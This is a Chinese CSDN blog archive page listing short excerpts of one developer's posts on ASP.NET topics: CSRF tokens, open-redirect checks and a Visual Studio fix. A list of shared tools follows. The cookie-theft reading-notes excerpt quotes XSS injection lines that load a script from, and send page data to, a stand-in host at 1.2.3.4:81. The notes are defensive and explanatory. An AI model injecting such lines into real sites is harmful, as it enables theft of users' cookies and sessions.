自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

kdf123的专栏

  • 博客(4)
  • 资源 (14)
  • 收藏
  • 关注
全部文章> 2013年11月
排序:
按最后发布时间
按访问量
RSS订阅
11月 02月

原创 Visual Studio 下开发无法引用App_Code 里的类

在Visual Studio里开发时,在App_Code文件夹啊里建立的类,无法在项目其他文件夹里引用到  这里有一个解决方法,就是设置App_Code里的类文件的属性设置App_Code里的类文件属性“生成操作”为“编译”,问题解决。

2013-11-17 10:52:07 2858

原创 读书笔记——威胁:跨站请求伪造

跨站请求伪造(Cross-Site Request Forgery,CSRF,但也用缩写XSRF表示),CSRF比简单的跨站脚本攻击更具危险性。阻止CSRF攻击1)、令牌验证可采用ASP.NET MVC 框架自带的方法:@Html.AntiForgeryToken()...Html.AntiForgeryToken辅助方法会输出一个加密值作为隐藏的输入元素:

2013-11-07 18:25:20 1359

原创 读书笔记——威胁:cookie盗窃

一般网站涉及cookie有两种形式:1、会话cookie2、持久性cookie 攻击者的方式可以有以下:a、输入文本“http://1.2.3.4:81/xss.js">"/>">http://www.a.com/a.jpg””b、window.location="http://1.2.3.4:81/r.php?u="+document.links[1].tex

2013-11-07 17:37:26 1200

原创 ASP.NET MVC 检测开放重定向攻击方法

IsLocalUrl方法是ASP.NET MVC 3.0新加的登录路径验证方法 //System.Web.WebPages RequestExtensions class private bool IsLocalUrl(string url) { if (string.IsNullOrWhiteSpace(url))

2013-11-07 17:03:13 1327

verydoc_dwg2image_cmd CAD 转 图片
verydoc_dwg2image_cmd 还行的

2019-04-24

svn previous operation has not finished解决方法
svn previous operation has not finished

2014-07-24

Reflector工具
Reflector反射工具,可以结合Visual Studio来发环境,学习源码好工具,当然我支持正版的,O(∩_∩)O~

2014-06-16

ILSpy_2.1.0.1603
ILSpy_2.1.0.1603,类似于Reflector,也非常好用

2014-06-16

DbToolSetup
咨微海信数据库比较工具 DbToolSetup.msi 在网上找了好半天的数据库比较工具,非常好用,不过以前有个版本使用的时候很卡,这个不卡的。

2014-06-16

HTML手册W3C中文参考手册大集合
W3C中文参考手册大集合 各大浏览器 CSS3 和 HTML5 兼容速查表-CSDN.NET_files

2014-01-21

AntiXSS Library v4.2
AntiXSS 库目前处于版本 4.2.1,下载地址:http://www.microsoft.com/download/en/details.aspx?id=28589。它经历了一次非常棒的重新编写过程,并且就安全性而言,它提供了比 ASP.NET 附带的编码器更好的 HTML 编码器。 并不是说 Server.HtmlEncode 有什么问题,只是它侧重于兼容性而不是安全性。 AntiXSS 使用不同的方法进行编码。 有关详细信息,请访问 msdn.microsoft.com/security/aa973814。Jon Galloway 在 http://weblogs.asp.net/jgalloway/archive/2011/04/28/using-antixss-4-1-beta-as-the-default-encoder-in-asp-net.aspx 中发布了有关此内容的精彩文章。

2013-11-07

C#本质论(3版).pdf
很好,C#本质论(3版).pdf

2012-12-14

mongoDB简介.doc
mongoDB 简介

2012-12-14

网页Flash文章阅读器结合FlashPager
FlashPager,类似百度文库,这个大家都很熟悉,结合开源的FlashPager,效果很好,像水晶报表

2012-07-25

PDF to JPG
PDF to JPG转化后的效果较好,可以控制导出图片大小,采用此工具是为了做电子刊物

2012-07-25

身份证号码号码验证JS
身份证号码号码验证JS。可以非常严格的对所输入的号码进行验证,特别是有‘X’的,以及二代身份证。

2011-03-03

jQuery 1.4基础教程
该资源10分有点亏了。 jQuery 1.3自从2008年1月14日发布后,后引来了各界的关注。2010年1月22日,更新至JQuery 1.4版本,本版是参考shawphy的1.4在线版本(http://jquery-api-zh-cn.googlecode.com/svn/trunk/xml/jqueryapi.xml)制作,更新了好多以前的内容,以前没仔细核对过,发现之前网上流行的chm版本基本都基于1.2的,1.3的内容很多都没加进去,这次都补全了。

2011-03-03

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除